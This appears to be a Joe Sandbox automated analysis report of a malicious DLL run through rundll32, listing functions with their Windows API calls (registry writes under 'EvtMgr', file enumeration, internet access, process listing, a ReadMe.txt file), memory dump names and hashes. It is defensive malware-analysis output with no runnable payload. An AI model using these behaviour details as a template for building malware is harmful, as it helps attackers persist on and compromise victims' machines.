Instruction Fuzzy Hash: 9CC04CF58007109BF642DBA49D85B4A3799E74C28AB018424F51DD222AE734E2959B15

Function 10002640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(70440000,00000000), ref: 10002664

Strings

TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002650

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: TmV0QXBpQnVmZmVyRnJlZQ==
API String ID: 190572456-3244026974
Opcode ID: 5da32a4a5574a052550975bb5b0bbc93ab09694d4bcd5f2703c64bdbfbfc511d
Instruction ID: 0ade1f184abd6a37764815a29ceca78810d2d009be9ca9e5ee1f1b4efe6a2c35
Opcode Fuzzy Hash: 5da32a4a5574a052550975bb5b0bbc93ab09694d4bcd5f2703c64bdbfbfc511d
Instruction Fuzzy Hash: AFC08CF88006205BF642CB608C84B0A3398E30C38AB008010F659D222AD730E1A08B11

Function 1000B5E0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1000B0A0: lstrcpy.KERNEL32(?,?), ref: 1000B0D9
Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,10019BD4), ref: 1000B0F2
Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,*.*), ref: 1000B101
Part of subcall function 1000B0A0: FindFirstFileA.KERNEL32(?,?,?,1000B62C,?), ref: 1000B113

Sleep.KERNEL32(0036EE80), ref: 1000B686

Strings

C:\Program Files, xrefs: 1000B5E9

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: lstrcat$FileFindFirstSleeplstrcpy
String ID: C:\Program Files
API String ID: 187370985-1387799010
Opcode ID: 104c4d2efdd1e2322e4b23a01710967e339c577f5a1987c4c7f9844ac907495e
Instruction ID: 61b073742c814ce492014a967659e3b424d997019ce0857d6221e672e47afb5b
Opcode Fuzzy Hash: 104c4d2efdd1e2322e4b23a01710967e339c577f5a1987c4c7f9844ac907495e
Instruction Fuzzy Hash: 3E113CB88057559BF300DF69ECD15477BE0FB84684F008929E85587316E735D649CBA3

Function 049C05A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 049C0625
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 049C0658

Memory Dump Source

Source File: 0000000B.00000003.1301915440.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_3_49c0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
Instruction ID: c19d5ef58a4030f0aaaf25bdc195f52833e793e128d6b36451d254f332fb3be1
Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
Instruction Fuzzy Hash: 2D213831A00219FFDB008FA0CC40BEEFBF5EB45394F508136E920A2280E7745A119B51

Function 10004C20 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,1000906E,80000001,00000000,?), ref: 10004C4D

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 150bd87b14d3b07de01cf752c73747d879c117e8bc87c6aeaf82a9217c82b333
Instruction ID: 4b958377b8f6819c9cb17a5be3b00e8c41f947a8e294ec63b8cfc4c184e4756b
Opcode Fuzzy Hash: 150bd87b14d3b07de01cf752c73747d879c117e8bc87c6aeaf82a9217c82b333
Instruction Fuzzy Hash: 24E00AB5218601AF9604CF49D894C1BB3F9BBCD700F10CA0CB599C3254D630E806CB62

Function 10004B40 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000003,00000003,00000003,00000003,00000003,40000000,?,1000BBE4,c:\ijbbn\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004B63

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9c96cc994586578f316554800c59ad217e0e27d90daea8609a1871e27ba07cfa
Instruction ID: b1acddf2ec3e37a5d5dcdfaa1de533b66f54714f002444a5cde71aefe8c48c35
Opcode Fuzzy Hash: 9c96cc994586578f316554800c59ad217e0e27d90daea8609a1871e27ba07cfa
Instruction Fuzzy Hash: 85D0A2B6618212AF9644CF98EA94D1BB7E9ABCCB00F10890CB585D3254D670EC49CB73

Function 10004C70 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,771B0F10,?,1000AAC6,?,771B0F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0fccdda7f6bc64189a44bad6c102572695505bb3016eb6268000810ac36e3e21
Instruction ID: ebaf1be8d889f364eaf5267f0a81e264a20874aa47e59fc56bef3f2ec861e65a
Opcode Fuzzy Hash: 0fccdda7f6bc64189a44bad6c102572695505bb3016eb6268000810ac36e3e21
Instruction Fuzzy Hash: 13D0BCB5618742AF9744CF58D994C3BB7E9BBC8611F148D0CB59583254D730E849CB62

Function 10004CC0 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNEL32(?,?,?,?,?,?,100090C2,?,EvtMgr,00000000,00000001,?), ref: 10004CDE

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: acb95854f7ebfe107d9ad6fa5725a02533b256ecd7490f7e051e36ee0d353bb8
Instruction ID: f56af968e5fe79637af5710c571a5d5bb89e367fb5f00816f0ff50808f0d9261
Opcode Fuzzy Hash: acb95854f7ebfe107d9ad6fa5725a02533b256ecd7490f7e051e36ee0d353bb8
Instruction Fuzzy Hash: 96D06CF5208342AF9704CF48D984C3BB3E9BBC8600F048D0CB59683210C734E808CB62

Function 10004960 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000497E

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: d5fa67fd77fc08087aa00dd8c2a10ade798770437726e994f987ef2aecb902aa
Instruction ID: 24a332b1a684adcd34ca85a3606a9ea4ce0bf4268c39e93a7a2cc773aab27df0
Opcode Fuzzy Hash: d5fa67fd77fc08087aa00dd8c2a10ade798770437726e994f987ef2aecb902aa
Instruction Fuzzy Hash: E5D0BCB5618342AF9704CF98D994D3BB7E9BBC8610F148D0CB59983254D730E849CB62

Function 10004CA0 Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,?,?,00020019,1000AA61,80000002,1000B947,00000000,00020019,?,?,?,771B0F00), ref: 10004CB9

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: adf75bf85e2af3ddcfeaeaac0d99d0987dcd00327a37493a0bb918ee9644fffb
Instruction ID: 50e6064c7111890aa9a03aac3f3b9a89cc62f2ac42a6c8a70e0450a1f82d0af1
Opcode Fuzzy Hash: adf75bf85e2af3ddcfeaeaac0d99d0987dcd00327a37493a0bb918ee9644fffb
Instruction Fuzzy Hash: 0ED0C2B9218201AF9604CB54D994C2BB3E9ABC8711F10C90CB59983240C630EC04CB22

Function 10004940 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(?,?,?,?,?), ref: 10004959

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6e00a86521e39f70200af91c0e782be9a776f46f6143d79cb541def31d59b899
Instruction ID: c57f2b60c8454c0bab147a503f00b76e005ba1046bd805275401aac779bd7d3b
Opcode Fuzzy Hash: 6e00a86521e39f70200af91c0e782be9a776f46f6143d79cb541def31d59b899
Instruction Fuzzy Hash: B4D0C5F9218201AFAA08CB98D994D2BB3E9ABC8711F00C90CB5A983240C634E805CB22

Function 10004A80 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000080,00000080,00000004,00000000,1000BBF2,00000000,00000000,00000000,00000002,c:\ijbbn\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004A94

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 307ad37cac304fa9a49160dccf8dcea02f02b058180b3fe4503caacfb64423ba
Instruction ID: 6891ee5e46bc57ffaf97ee454a71f1b365b33a6ff264fc0d3ac975428b6807b6
Opcode Fuzzy Hash: 307ad37cac304fa9a49160dccf8dcea02f02b058180b3fe4503caacfb64423ba
Instruction Fuzzy Hash: C1C002B9608301BFDA04CB54C888D6BB7E9EBC8340F00C90CF999C3210C674E880CB22

Function 100048E0 Relevance: 1.5, APIs: 1, Instructions: 8synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c3fc0ddbfa11ab48aec40ca6578fb8896d180a8c1cb42ca496ab622c98b4a772
Instruction ID: 2243b4d894195d018e8de0dd45e47365024512defcc99eb91dc30795441f5685
Opcode Fuzzy Hash: c3fc0ddbfa11ab48aec40ca6578fb8896d180a8c1cb42ca496ab622c98b4a772
Instruction Fuzzy Hash: 07C04C78104211BFDA04CB14C984C2BB7A9EBC4610F00C90CB89582214C630EC80DB51

Function 10004B10 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: NamePathShort
String ID:
API String ID: 1295925010-0
Opcode ID: 9f5cfde4427fa5097d0c1c0217ac771adfd46cf51cf8a9311dee08de603acc45
Instruction ID: 5a9084a55f8d2033a769c09c7aad229fb9ca7a40d13baa6944edb8cb5aec9d82
Opcode Fuzzy Hash: 9f5cfde4427fa5097d0c1c0217ac771adfd46cf51cf8a9311dee08de603acc45
Instruction Fuzzy Hash: B2C048B8208200BFEA04CB10C988C3BB7E9EBC9610F00C90CF88983210C670EC40DB22

Function 100014A0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(049C4068), ref: 100014B6

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3fdfd97ca8c23d8f0530906f45af778a22596f4696536d932bba85b17bd97f22
Instruction ID: 725f2ff9a6cedf6bbb67758c43434fa7ac3ec696b7c5dfde3be615a84814b02d
Opcode Fuzzy Hash: 3fdfd97ca8c23d8f0530906f45af778a22596f4696536d932bba85b17bd97f22
Instruction Fuzzy Hash: 75B092B0801520CBEB02CB6088C840B7674A30C2423108205FA10C3228EB34D0009B50

Function 100014D0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(049C3060), ref: 100014E6

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a7f2342bc6644b56cfd7610f8ddd93b81e28e0250071e72ee512f0feba057ba5
Instruction ID: 35b88f928cdc07da968701179a6f33f0e97a6378d6662f65b823b83c2d3665f9
Opcode Fuzzy Hash: a7f2342bc6644b56cfd7610f8ddd93b81e28e0250071e72ee512f0feba057ba5
Instruction Fuzzy Hash: A8B092B4900520CBEA12CBA0888840B76A4B30C2813008205F920C3229EB30D000DB10

Function 10004D10 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

Process32First.KERNEL32(00000000,00000000), ref: 10004D1A

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 06074555a490e452e0c33516115e8def1b160905719b86e6ca60f0acd3be714b
Instruction ID: 43577a1182ef3f798ff4e4d470cfcf9041e9be16eb90189a2022d36134155a7f
Opcode Fuzzy Hash: 06074555a490e452e0c33516115e8def1b160905719b86e6ca60f0acd3be714b
Instruction Fuzzy Hash: 51B09275504200ABD214DB10C994C2BB7A8AB94301B00C809B48A82210C630D840CB21

Function 10001530 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(049C1050), ref: 10001546

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2558f847f3bd71bba4265f3a4f9d7399b42694cb2fe8554de869f675100a772c
Instruction ID: 0f05b9913dce9b7b17749fc1586e01a4e82b3307b98390648e12e362a5b60e72
Opcode Fuzzy Hash: 2558f847f3bd71bba4265f3a4f9d7399b42694cb2fe8554de869f675100a772c
Instruction Fuzzy Hash: 9DB092F0800A20CBFA128B608CC84473774A34C242320C002F911C7224E730C154DB20

Function 10004D30 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(?,00000000), ref: 10004D3A

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: fb3d1d2fe4f58d77b62947db14fcf388f89edba650b3a7b099c6c960cb254603
Instruction ID: 432f843a027fd044bab358c4309ee591cd41ce3803a4c335f332d4fec9f9d121
Opcode Fuzzy Hash: fb3d1d2fe4f58d77b62947db14fcf388f89edba650b3a7b099c6c960cb254603
Instruction Fuzzy Hash: EDB092B5104200ABD214DB10C984C2BB7A8ABD4301B008808B48A82110C634D880CB21

Function 10001590 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0321D1E0), ref: 100015A6

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b8e4ff15c4138358dcbf467bb1e805bc5a866f0c9e2c71367f6b70752848133d
Instruction ID: 22283fd24f107b37298acc13f8db5db648e85e1336fc49587faefca2ed5f0806
Opcode Fuzzy Hash: b8e4ff15c4138358dcbf467bb1e805bc5a866f0c9e2c71367f6b70752848133d
Instruction Fuzzy Hash: 24B092B0850924CBF612CB608CC840B3774A78C2423408201F915C7225E730C010DB10

Function 10001620 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0321A1C8), ref: 10001636

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 854aff89b505d9f21911f8c1ba55fbf1c8cc102515e225042a2c32485127d58f
Instruction ID: 6451e9acda46e7ae8c67071bb3abdc211bd966f3bbc7d4a56457b69d03684d62
Opcode Fuzzy Hash: 854aff89b505d9f21911f8c1ba55fbf1c8cc102515e225042a2c32485127d58f
Instruction Fuzzy Hash: B2B092B09016248BEB12CF608C8844B3764A30C2413448405F920C3228E734C008DB10

Function 100016B0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(032171B0), ref: 100016C6

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
